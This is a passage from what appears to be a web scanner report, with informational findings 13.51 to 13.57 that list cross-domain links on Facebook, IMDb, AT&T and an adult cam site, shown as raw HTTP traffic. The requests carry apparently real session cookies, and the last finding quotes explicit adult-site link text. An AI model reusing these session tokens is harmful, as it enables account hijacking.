Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.210.43
X-Cnection: close
Date: Mon, 15 Aug 2011 18:45:36 GMT
Content-Length: 4150

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/57RstpFlgWp.css" />
<script>
...[SNIP]...

13.51. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=facebook.com%2Fimdb&width=300&connections=5&stream=false&header=false&height=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.36.45
X-Cnection: close
Date: Mon, 15 Aug 2011 18:23:58 GMT
Content-Length: 11024

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/mVJg8S3A2Rm.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/kd21gmpJn12.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/gg0OewYY6QF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vIpx6O3T-P_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/gvrW9GGxv2y.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/U-hWvICPM7_.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/Qcl4G42wSa6.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/BNIl95--AXH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/imdb" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203506_15925638948_8044034_q.jpg" alt="IMDb" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/MLTodd726" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/274859_2352861_3371652_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002606714088" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275871_100002606714088_5704513_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ibrahimgun" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186094_764018686_5437939_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273304_1063127687_7500065_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000769132219" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48822_100000769132219_2194526_q.jpg" alt="" /><div class="name">
...[SNIP]...

13.52. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Fshowtimes%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/showtimes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.53.42
X-Cnection: close
Date: Mon, 15 Aug 2011 18:25:07 GMT
Content-Length: 5165

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/57RstpFlgWp.css" />
<script>
...[SNIP]...

13.53. http://www.imdb.com/tv/widget/grid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /tv/widget/grid

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tv/widget/grid?context=rhs_tv_widget&show_episode=1 HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; __utma=168836921.779117687.1313426596.1313426596.1313426596.1; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cs=Hmt+tyNJuDdEdOWWQN1wNAbGfbqgkW2NmMHlGqPyXoojoi6JgDJ+ibCRbYoGES2aoJFb/fPXTbqjhMntt9HNyTCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc17%3Bs%3Dc4%3Bs%3Dc12%3Bs%3Dc1%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:02 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=FJ6+Vfy70D/Z45zlX+GrcwiOAiSO2RITtqma5I26UQQN6lEXrnoBF57ZEhQoWVIEjtkkY9oeAiSISmaH3b/xMimZspfO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Tue, 16 Aug 2011 07:00:00 GMT;path=/;domain=.imdb.com
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Vary: User-Agent
Content-Length: 6412

<a name="grid_start" id="grid_start" ref="2011-08-15/2000/Mon. Aug. 15"></a>
<div class="tv_grid">
<div class="tv_channels">
<div id="row_0" onmouseover="if (typeof(imdb_tv_widget_init)!='undefined'){
...[SNIP]...
<a name="ABC"
href="/tvgrid/2011-08-15/ABC/" title="ABC">
<img border="0" src="http://ia.media-imdb.com/images/M/MV5BMTgyOTY3NTk4NV5BMl5BcG5nXkFtZTcwMjQ5NzIyMw@@._V1_.png" alt="ABC">
</a>
...[SNIP]...
<a name="CBS"
href="/tvgrid/2011-08-15/CBS/" title="CBS">
<img border="0" src="http://ia.media-imdb.com/images/M/MV5BMTc2MTk2ODQwMF5BMl5BcG5nXkFtZTcwMDg5MTMzNA@@._V1_.png" alt="CBS">
</a>
...[SNIP]...
<a name="CW"
href="/tvgrid/2011-08-15/CW/" title="CW">
<img border="0" src="http://ia.media-imdb.com/media/imdb/01/I/73/87/51/10.gif" alt="CW">
</a>
...[SNIP]...
<a name="Fox"
href="/tvgrid/2011-08-15/Fox/" title="Fox">
<img border="0" src="http://ia.media-imdb.com/media/imdb/01/I/23/55/51/10.gif" alt="Fox">
</a>
...[SNIP]...
<a name="NBC"
href="/tvgrid/2011-08-15/NBC/" title="NBC">
<img border="0" src="http://ia.media-imdb.com/images/M/MV5BMTI4MzI3MTkyMV5BMl5BcG5nXkFtZTcwNDM5NzIyMw@@._V1_.png " alt="NBC">
</a>
...[SNIP]...

13.54. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135031
Expires: Mon, 15 Aug 2011 18:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:04 GMT
Connection: close
Set-Cookie: TLTHID=31FEFBDCC76B10C7BCD0FCE33BDE3340; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...
<li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a>
...[SNIP]...
<p>-->
<a href='https://sales.liveperson.net/hc/76226072/?cmd=file&amp;file=visitorWantsToChat&amp;site=76226072&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=cingular' target='chat76226072'>
   <img id='hcDynamicIcon' name='hcDynamicIcon' src='/cell-phone-service/livePerson/chat_deployment_global/cingular/images/noscript_button/reponline.gif' alt='Live Chat' border='0' />
...[SNIP]...
</script>

<script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script>
...[SNIP]...
<div class="logoBlock">
               
                   
                                                                                                                           <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For
...[SNIP]...
</a>
                   
               
                                                                                       <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png">
...[SNIP]...

13.55. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/globemaintenance.gif

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store_maintenance/images/globemaintenance.gif?01RI=0F8495D0A0133CD&01CM=cm:akamai.mathtag.com&01NA=ck& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39843
Expires: Mon, 15 Aug 2011 18:20:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:43 GMT
Connection: close
Set-Cookie: TLTHID=49D56B56C76B10C79A33B13681FBD5E5; Path=/; Domain=.att.com


                                                                                   
...[SNIP]...
<div class="logoBlock">
               
                   
                                                                                                                           <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For
...[SNIP]...
</a>
                   
               
                                                                                       <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png">
...[SNIP]...

13.56. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/page_midSlice.gif

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store_maintenance/images/page_midSlice.gif?01RI=1946BF68A41E07A&01CM=cm:akamai.mathtag.com&01NA=ck& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39843
Expires: Mon, 15 Aug 2011 18:20:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:43 GMT
Connection: close
Set-Cookie: TLTHID=49D5C484C76B10C7C0C896712A89A4E2; Path=/; Domain=.att.com


                                                                                   
...[SNIP]...
<div class="logoBlock">
               
                   
                                                                                                                           <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For
...[SNIP]...
</a>
                   
               
                                                                                       <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a>
                   
               
                                                                                       <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png">
...[SNIP]...

13.57. http://www.xhamstercams.com/cam/Juicy_Jules19/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /cam/Juicy_Jules19/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cam/Juicy_Jules19/?gl=1&AFNO=1-0-624213-344279&UHNSMTY=458&lp=3 HTTP/1.1
Host: www.xhamstercams.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NaiadJP=cj1odHRwJTNBJTJGJTJGeGhhbXN0ZXIuY29tJTJGJmU9aHR0cCUzQSUyRiUyRnd3dy54aGFtc3RlcmNhbXMuY29tJTJGZXhwb3J0cyUyRmdvbGl2ZSUyRiUzRkFGTk8lM0QxLTAtNjI0MjEzLTM0NDI3OSUyNlVITlNNVFklM0Q0NTglMjZERiUzRDAlMjZscCUzRDMmbz0xMzEzNDM0NTg2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:48 GMT
Server: Apache
Set-Cookie: fcact=fcA6_2502%2F2Z; expires=Mon, 22-Aug-2011 18:56:48 GMT; path=/
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Vary: Accept-Encoding
Content-Length: 32305
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free live video chat, free nude cam, sex shows, adult streaming, free porn - XHamsterCam
...[SNIP]...
<meta name="robots" content="all">
<link rel="stylesheet" type="text/css" href="http://m2.nsimg.net/2.0/shared/css/20110815/style-min.css" media="all">
<link rel="stylesheet" type="text/css" href="http://m1.nsimg.net/2.0/skin/xhc/css/20100812/style-skin-min.css" media="all">
<meta name="description" content="XHamsterCams Model Juicy_Jules19 Bio">
...[SNIP]...
<link rel="canonical" href="http://www.xhamstercams.com/cam/Juicy_Jules19/?lp=3">
<link rel="stylesheet" type="text/css" href="http://m1.nsimg.net/2.0/skin/xhc/css/20100412/style-skin-min.css">
<link rel="stylesheet" type="text/css" href="http://m1.nsimg.net/cache/chat/landing-page/3/avchat/20110106/shared-style.css">
<style type="text/css">
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://m1.nsimg.net/static/x/google/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<div id="chatContainer" class="chatContainer"> <img id="spacerimg" src="http://m1.nsimg.net/shared/transparent.gif" alt="" style="height: 568px">
<p id="alternativeContent" >
...[SNIP]...
<p id="installFlashContent">XHamsterCams requires <a href="http://get.adobe.com/flashplayer/" target="_blank" rel="nofollow" class="visible">Adobe Flash player</a>,please <a href="http://get.adobe.com/flashplayer/" target="_blank" rel="nofollow" class="visible">click here</a>
...[SNIP]...
<br><a href="http://get.adobe.com/flashplayer/" target="_blank" rel="nofollow" class="visible">Adobe Flash player</a>
...[SNIP]...
<noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" id="preview" width="673" height="568">
<param name="movie" value="http://www.naiadexports.com/flash/generic/20110707/avchat.swf">
...[SNIP]...
<param name="allowScriptAccess" value="always">
<embed src="http://www.naiadexports.com/flash/generic/20110707/avchat.swf" menu="false" quality="high" scale="noscale" bgcolor="#FFFFFF" width="957" height="568" id="avchat" name="avchat" swliveconnect="true" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/brunette-girls/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/brunette.jpg" alt="Brunette LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/latin-girls/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/latina.jpg" alt="Latina LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/asian-girls/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/asian.jpg" alt="Asian LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/pornstars/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/pornstar.jpg" alt="Pornstars LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/ebony-girls/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/ebony.jpg" alt="Ebony LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/blonde-girls/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/blonde.jpg" alt="Blonde LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/anal-sex/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/anal.jpg" alt="Anal LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/straight-couples/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/couples.jpg" alt="Couples LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/redhead-girls/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/redhead.jpg" alt="Redhead LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/big-tits/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/bigtits.jpg" alt="Big Tits LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
<a href="http://www.xhamstercams.com/webcam/teen-girls/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/teen.jpg" alt="Teens LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
